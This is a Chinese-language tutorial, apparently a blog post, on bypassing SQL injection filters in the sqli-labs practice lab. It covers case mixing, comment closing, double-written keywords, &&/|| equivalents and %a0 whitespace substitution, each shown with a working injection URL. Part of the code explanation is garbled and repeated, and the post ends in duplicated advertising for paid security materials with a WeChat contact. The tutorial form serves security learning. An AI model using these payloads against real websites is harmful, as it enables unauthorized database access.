一、SQL 注入的绕过技术
1、大小写绕过
如果过滤器通过关键字进行过滤并没有识别大小写 ,我们就可以使用大小写来进行绕过,因为 SQL
语句是不区分大小写的。
原始语句
SELECT * FROM users WHERE id=‘1’ LIMIT 0,1
大小写掺杂注入
SELECT * FROM users WHERE id=‘1’
And
1=1–+’ LIMIT 0,1
问题存在的原因是:过滤器过滤了正常的关键字,但是并没有对字符串进行处理。
2、注释绕过
Less-23
[root@localhost ~]# vim /var/www/html/sqli-labs/Less-23/index.php
我们可以看到 Less-23 中源代码过滤了单行注释的方法,我们可以正常闭合 SQL 语句来进行绕过。
程序代码中的 preg_replace(查找并替换)解释:
i d = p r e g _ r e p l a c e ( id = preg\_replace( id=preg_replace(reg, $replace, $id)
# i d = 表示重新赋值, p r e g _ r e p l a c e ( ) 查找和替换的函数, id = 表示重新赋值,preg\_replace()查找和替换的函数, id=表示重新赋值,preg_replace()查找和替换的函数,reg 表示 reg 变量中的值为查找内容(值为:#), r e p l a c e 表示 r e p l a c e 变量中的值为替换内容(该值为空), replace 表示 replace 变量中的值为替换内容(该值为空), replace表示replace变量中的值为替换内容(该值为空),id 表示查找并替换的目标。
即是对用户传递 id 的值中的内容,查找# 并替换为空,而后再重新赋值回 id,从而达到过滤效果
通过以上程序中代码可看到被过滤的有 # 和 – ,因此不能够使用注释进行注入,下面绕过注释进
行注入。
例 1:
http://192.168.1.103/sqli-labs/Less-23/?id=-1’ union select 1,database(),'3
我们在第三个字段前添加一个单引号来闭合 id 字段后面的单引号,我们前面用到了一种类似的方
法。
语句分析:
语句中的
-1’
union select 1,database(),
‘3
,其中的
-1’
单引号用于闭合原语句中的前面单引
号,
'3
是用于闭合原语句中后面的单引号
原来语句:
SELECT * FROM users WHERE id=‘$id’ LIMIT 0,1
注入后的语句:
SELECT * FROM users WHERE id=’
-1’ union select 1,database(),'3
’ LIMIT 0,1
由此可以拼接成一条完整可执行的语句。
例 2:使用逻辑运算注入
http://192.168.1.103/sqli-labs/Less-23/?id=-1’ union select 1,database(),3 and ‘1’='1
使用 and 或者 or 添加一个表达式 or ‘1’ = '1 注意后面一定要缺省一个单引号。否则 SQL 语句不能正常闭合。
3、双写绕过
前面我们介绍了 PHP 过滤函数可以过滤注释符,同样它也可以过滤关键字。
Less-25
代码中过滤了 or 和 AND,大小写同样都被过滤了
例 1:双写搭配大小写绕过
http://192.168.1.103/sqli-labs/Less-25/?id=-1’ union select 1,database(),3 AandNd ‘1’='1
4、关键字等价绕过
Less-25
例 1:
http://192.168.1.103/sqli-labs/Less-25/?id=1 && id=2–
我们可以看到这条语句 id=1 后面并没有单引号,原因是使用&&进行连接时不需要进行闭合,流程
为 id=1 然后继续执行 id=2 最后–+单行注释
因为 id=1 && id=2 都是在同一个 URL 中指定,首先 id=1,这个时候 id 的变量中的值为 1。此
时,数据还没带到数据库里查询,因为还有 && id=2,然后 id 再重新传递一次,这个时候 id 的变量中
的值就变成了 2,然后传参结束,所以最终的值是 2,再到数据库里执行,结果是 id=2 的记录。
例 2:
http://192.168.1.103/sqli-labs/Less-25/?id=-1’ || id=2–+
这里 id=-1’使 SQL 语句报错并使用单引号进行闭合,然后拼接 || 执行 id=2 最终–+单行注释
|| 前面 SQL 语句执行失败才会执行后面语句,这一点和 union 是一样的,需要我们手动将前面代码
进行报错。
5、绕过去除空格
Less-26
可替代空格使用的符号:
%20 %09 %0a %0b %0c %0d %a0 /**/ #ascii 码转 url 编码
例:当前案例测试只有%a0 可以替换成功。
http://192.168.1.106/sqli-labs/Less-
26/?id=0%27%a0union%a0select%a01,database(),3%a0%26%26%a0%271%27=%271
相当于:
http://192.168.1.63/sqli-labs/Less-26/?id=0’ union select 1,database(),3 && ‘1’='1
说明:
%a0 #表示空格,MySQL 中%a0 代表空白符,可以代替空格
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
给大家的福利
零基础入门
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
因篇幅有限,仅展示部分资料
网络安全面试题
绿盟护网行动
还有大家最喜欢的黑客技术
网络安全源码合集+工具包
所有资料共282G,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~
一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!
AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算
ng)
所有资料共282G,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~
一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!
AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算